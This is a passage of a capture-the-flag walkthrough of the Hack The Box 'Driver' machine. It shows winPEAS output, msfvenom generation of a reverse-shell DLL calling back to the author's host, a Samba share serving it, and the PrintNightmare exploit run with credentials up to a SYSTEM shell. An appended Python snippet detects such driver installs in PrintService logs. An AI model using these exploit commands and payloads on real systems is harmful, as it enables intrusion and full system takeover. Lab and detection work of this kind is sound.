[...]
  UDP        127.0.0.1             1900          *:*                            868               svchost
  UDP        127.0.0.1             62499         *:*                            868               svchost
[...]
╔══════════╣ Looking AppCmd.exe
╚  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe
    AppCmd.exe was found in C:\Windows\system32\inetsrv\appcmd.exe
      You must be an administrator to run this check
[...]
╔══════════╣ Analyzing Windows Files Files (limit 70)
    C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
    C:\Users\All Users\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\wording\Generic Model\index.dat
    C:\Program Files\MySQL\MySQL Server 5.5\my.ini
    C:\Users\Default\NTUSER.DAT
    C:\Users\tony\NTUSER.DAT
    C:\Program Files\iis express\PHP\v7.4\php.ini
    C:\Program Files\iis express\PHP\v7.3\php.ini
    C:\Program Files (x86)\iis express\PHP\v7.3\php.ini
    C:\Program Files\Microsoft\Web Platform Installer\WebPlatformInstaller.exe.config
    C:\Program Files\Microsoft\Web Platform Installer\WebpiCmd.exe.config
    C:\Program Files\Microsoft\Web Platform Installer\WebpiCmd-x64.exe.config
[...]

Once again I have reported only the sections that were of interest to me for the investigation, but even in this case they were not the right way to reach my objective.

The fog before my eyes cleared when I retraced my steps and thought again about the main theme of the BOX: printing. So I searched for "elevation privileges using windows printer", almost absurdly, but on these occasions the simplest way, even if unlikely, is the right one. Two interesting articles came up, which I report below.

Remote print server gives anyone Windows admin privileges on a PC
A researcher has created a remote print server allowing any Windows user with limited privileges to gain complete control over a device simply by installing a print driver.

Universal Privilege Escalation and Persistence Printer

Unfortunately neither of them works, but investigating the first article and following the links in it, I find that the PrintNightmare exploit is based on CVE-2021-1675. So I search for it on GitHub and an interesting repository comes up.

GitHub - cube0x0/CVE-2021-1675: C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527
C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527 - GitHub - cube0x0/CVE-2021-1675: C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527

Ok, I download the repository on my machine.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.106 - Driver (win)/attack/evil]
└─$ git clone https://github.com/cube0x0/CVE-2021-1675.git     
Cloning into 'CVE-2021-1675'...
remote: Enumerating objects: 173, done.
remote: Counting objects: 100% (173/173), done.
remote: Compressing objects: 100% (105/105), done.
remote: Total 173 (delta 62), reused 133 (delta 36), pack-reused 0
Receiving objects: 100% (173/173), 1.45 MiB | 3.91 MiB/s, done.
Resolving deltas: 100% (62/62), done.

Reading the repository, it is evident that I have to prepare a payload for a reverse shell (or an attack script anyway). So let's prepare a reverse-shell DLL via msfvenom.

msfvenom reverse-shell payload cheatsheet

┌──(in7rud3r㉿Mykali)-[~/…/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.216 LPORT=4444 -f dll > shell-x64.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 8704 bytes

Another thing we read in the repository readme file is that the exploit will use the SAMBA protocol to connect to a share on my local machine and download the reverse-shell. So I have to configure my SAMBA server to accept incoming connections and activate the service (which is definitely off).

To configure the SAMBA share, add this section to the /etc/smb.conf file:

[smb]
    comment = Samba
    path = /tmp/
    guest ok = yes
    read only = no
    browsable = yes
    force user = smbuser

Then activate the service:

┌──(in7rud3r㉿Mykali)-[~/…/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675]
└─$ sudo service smbd status  
[sudo] password for in7rud3r: 
○ smbd.service - Samba SMB Daemon
     Loaded: loaded (/lib/systemd/system/smbd.service; disabled; vendor preset: disabled)
     Active: inactive (dead)
       Docs: man:smbd(8)
             man:samba(7)
             man:smb.conf(5)
                                                                                                                   
┌──(in7rud3r㉿Mykali)-[~/…/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675]
└─$ sudo service smbd start                                                                                    3 ⨯
                                                                                                                   
┌──(in7rud3r㉿Mykali)-[~/…/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675]
└─$ sudo service smbd status
● smbd.service - Samba SMB Daemon
     Loaded: loaded (/lib/systemd/system/smbd.service; disabled; vendor preset: disabled)
     Active: active (running) since Sun 2021-12-05 12:16:55 CET; 2s ago
       Docs: man:smbd(8)
             man:samba(7)
             man:smb.conf(5)
    Process: 1891 ExecStartPre=/usr/share/samba/update-apparmor-samba-profile (code=exited, status=0/SUCCESS)
   Main PID: 1895 (smbd)
     Status: "smbd: ready to serve connections..."
      Tasks: 4 (limit: 6971)
     Memory: 24.3M
        CPU: 107ms
     CGroup: /system.slice/smbd.service
             ├─1895 /usr/sbin/smbd --foreground --no-process-group
             ├─1897 /usr/sbin/smbd --foreground --no-process-group
             ├─1898 /usr/sbin/smbd --foreground --no-process-group
             └─1900 /usr/sbin/smbd --foreground --no-process-group

Dec 05 12:16:53 Mykali systemd[1]: Starting Samba SMB Daemon...
Dec 05 12:16:55 Mykali systemd[1]: Started Samba SMB Daemon.

Ok, copy the file to the shared folder via smb protocol, start the exploit and once again, cross your fingers.

┌──(in7rud3r㉿Mykali)-[~/…/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675]
└─$ cp shell-x64.dll /tmp/                                                                                   130 ⨯
                                                                                                                   
┌──(in7rud3r㉿Mykali)-[~/…/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675]
└─$ python3 CVE-2021-1675.py driver/tony:[email protected] '\\10.10.14.216\smb\shell-x64.dll'
[*] Connecting to ncacn_np:10.10.11.106[\PIPE\spoolss]
[+] Bind OK
[-] Failed to enumerate remote pDriverPath
module 'impacket.dcerpc.v5.rprn' has no attribute 'hRpcEnumPrinterDrivers'

I was almost sure I had found the right path, but let's not give up. It seems that I am not the first to have this kind of problem, and solutions are proposed in the repository's issue tracker.

module ‘impacket.dcerpc.v5.rprn’ has no attribute ‘hRpcEnumPrinterDrivers’ · Issue #48 · cube0x0/CVE-2021-1675
Hi, setup: Kali Linux (192.168.0.10) msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f dll -o /tmp/rev.dll /etc/samba/smb.conf [global] map to guest = Bad User serve...
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

Ok, let's try again.

┌──(in7rud3r㉿Mykali)-[~/…/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675]
└─$ python3 CVE-2021-1675.py driver/tony:[email protected] '\\10.10.14.216\smb\shell-x64.dll'    
[*] Connecting to ncacn_np:10.10.11.106[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.10.14.216\smb\shell-x64.dll
[*] Try 1...
Traceback (most recent call last):
  File "/home/in7rud3r/Dropbox/hackthebox/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675/CVE-2021-1675.py", line 188, in <module>
    main(dce, pDriverPath, options.share)
  File "/home/in7rud3r/Dropbox/hackthebox/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675/CVE-2021-1675.py", line 93, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist.

And once again I don't seem to be the first to have this new problem.

impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist. · Issue #24 · cube0x0/CVE-2021-1675
Hello. I always receive this message: impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist. Has anyone had the same...

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox]
└─$ smbclient \\\\10.10.14.216\\smb 
Enter WORKGROUP\in7rud3r's password: 
tree connect failed: NT_STATUS_NO_SUCH_USER

Okay, this time it seems to be my fault: the share forces a local user, smbuser, that does not exist on my machine, so the tree connect fails with NT_STATUS_NO_SUCH_USER. Let me comment out the line "force user = smbuser" and try again.

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox]
└─$ smbclient \\\\10.10.14.216\\smb   
Enter WORKGROUP\in7rud3r's password: 
Try "help" to get a list of possible commands.
smb: \> 

Ok, it seems to be working now.

┌──(in7rud3r㉿Mykali)-[~/…/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675]
└─$ python3 CVE-2021-1675.py DRIVER/tony:[email protected] '\\10.10.14.216\smb\shell-x64.dll'             130 ⨯
[*] Connecting to ncacn_np:10.10.11.106[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.10.14.216\smb\shell-x64.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 568, in writeFile
    return self._SMBConnection.writeFile(treeId, fileId, data, offset)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1650, in writeFile
    written = self.write(treeId, fileId, writeData, writeOffset, len(writeData))
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1358, in write
    if ans.isValidAnswer(STATUS_SUCCESS):
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3structs.py", line 454, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/in7rud3r/Dropbox/hackthebox/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675/CVE-2021-1675.py", line 192, in <module>
    main(dce, pDriverPath, options.share)
  File "/home/in7rud3r/Dropbox/hackthebox/_10.10.11.106 - Driver (win)/attack/evil/CVE-2021-1675/CVE-2021-1675.py", line 93, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 856, in request
    self.call(request.opnum, request, uuid)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 845, in call
    return self.send(DCERPC_RawCall(function, body.getData(), uuid))
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1298, in send
    self._transport_send(data)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1235, in _transport_send
    self._transport.send(rpc_packet.get_packet(), forceWriteAndx = forceWriteAndx, forceRecv = forceRecv)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 535, in send
    self.__smb_connection.writeFile(self.__tid, self.__handle, data)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 570, in writeFile
    raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)

The exploit still reports an error, but it seems to have worked anyway, and my listener gets a fantastic connection from the attacked system.

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox]
└─$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.216] from driver.htb [10.10.11.106] 49453
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>type c:\users\administrator\desktop\root.txt
type c:\users\administrator\desktop\root.txt
f******************************7
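Added example, not from the original post or the exploit repository: triage logic for Windows PrintService event records that would surface the driver install shown in the exploit output above (the `\??\UNC\...\shell-x64.dll` path the spooler was told to load). The "EventID|Message" record format, the sample lines and the function names are constructed; the samples mimic event 316 (driver added or updated, Operational log) and event 808 (spooler failed to load a plug-in, Admin log), and a real export via wevtutil or a SIEM needs its own field mapping.

```python
"""Triage Windows PrintService event records for driver installs that look
like PrintNightmare (CVE-2021-1675 / CVE-2021-34527).

Added example for this walkthrough, not code from the exploit repository.
Record format ("EventID|Message") and the sample lines are constructed to
resemble Microsoft-Windows-PrintService Operational event 316 and Admin
event 808.
"""
import re
from dataclasses import dataclass

# A driver whose file list points at a network share, or at the spooler's
# staging/backup directories, is the signature the exploit output shows.
UNC_PATH = re.compile(r"(\\\\[\w.-]+\\[^\s,]+|\\\?\?\\UNC\\[^\s,]+)", re.I)
STAGING_DIR = re.compile(r"\\spool\\drivers\\x64\\3\\(new|old)\\[^\s,]+", re.I)
PLUGIN_PATH = re.compile(r"plug-in module ([^\s,]+)", re.I)


@dataclass
class Finding:
    event_id: int
    reason: str
    evidence: str


def parse_record(line):
    """Split a constructed 'EventID|Message' record into its two parts."""
    event_id, _, message = line.partition("|")
    return int(event_id), message


def triage_print_events(lines):
    """Return Findings for records that deserve analyst attention."""
    findings = []
    for line in lines:
        event_id, message = parse_record(line)
        if event_id == 316:  # "Printer driver ... was added or updated. Files:- ..."
            m = UNC_PATH.search(message)
            if m:
                findings.append(Finding(316, "driver added from UNC path",
                                        m.group(0).rstrip(".")))
            m = STAGING_DIR.search(message)
            if m:
                findings.append(Finding(316, "driver file in spool staging dir",
                                        m.group(0).rstrip(".")))
        elif event_id == 808:  # "The print spooler failed to load a plug-in module ..."
            # A reverse-shell DLL is not a real driver, so the spooler logs a
            # load failure right after executing it: every 808 is worth a look.
            m = PLUGIN_PATH.search(message)
            findings.append(Finding(808, "spooler failed to load plug-in",
                                    m.group(1) if m else message))
    return findings


# Constructed sample export: one legitimate driver update, one exploit-style
# install, and the load failure logged for the rogue DLL.
SAMPLE_EVENTS = [
    r"316|Printer driver Microsoft XPS Document Writer v4 for Windows x64 Version-4 was added or updated. Files:- C:\Windows\System32\DriverStore\FileRepository\prnms001.inf_amd64_<hash>\Amd64\mxdwdrv.dll. No user action is required.",
    r"316|Printer driver 1234 for Windows x64 Version-3 was added or updated. Files:- \??\UNC\10.10.14.216\smb\shell-x64.dll, C:\Windows\System32\spool\drivers\x64\3\New\UNIDRV.DLL. No user action is required.",
    r"808|The print spooler failed to load a plug-in module C:\Windows\system32\spool\DRIVERS\x64\3\New\shell-x64.dll, error code 0x45A. See the event user data for context information.",
]

if __name__ == "__main__":
    for f in triage_print_events(SAMPLE_EVENTS):
        print(f"[{f.event_id}] {f.reason}: {f.evidence}")
```

The legitimate XPS driver record produces nothing, while the exploit-style record yields two findings (the UNC source and the staging directory) and the 808 record a third, which is the pattern a detection rule for this technique should key on rather than the spooler's generic "driver added" noise.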

And this time too, the root flag is mine. That's all folks, hack responsibly. See you next time.